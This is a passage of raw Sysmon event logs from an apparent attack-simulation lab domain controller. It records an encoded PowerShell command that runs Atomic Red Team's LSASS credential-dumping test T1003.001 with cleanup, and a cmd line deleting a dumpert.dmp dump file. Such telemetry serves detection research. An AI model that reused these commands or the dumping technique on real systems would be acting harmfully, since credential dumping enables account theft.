15:53:07.118{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE3-5FA1-5601-000000008801}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.118{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5601-000000008801}732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.120{D28789B6-7CE3-5FA1-5601-000000008801}732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.071{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE3-5FA1-5501-000000008801}3552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5501-000000008801}3552C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD7813) 10341000x80000000000000006211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CE3-5FA1-5501-000000008801}3552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.055{D28789B6-7CE1-5FA1-4001-000000008801}48042868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CE3-5FA1-5501-000000008801}3552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0374a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f035be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f85dea(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30efc1a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b5399(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f31478(wow64) 154100x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:07.068{D28789B6-7CE3-5FA1-5501-000000008801}3552C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "del C:\windows\temp\dumpert.dmp >nul 2> nul" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE5-5FA1-5801-000000008801}2736C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:09.746{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTE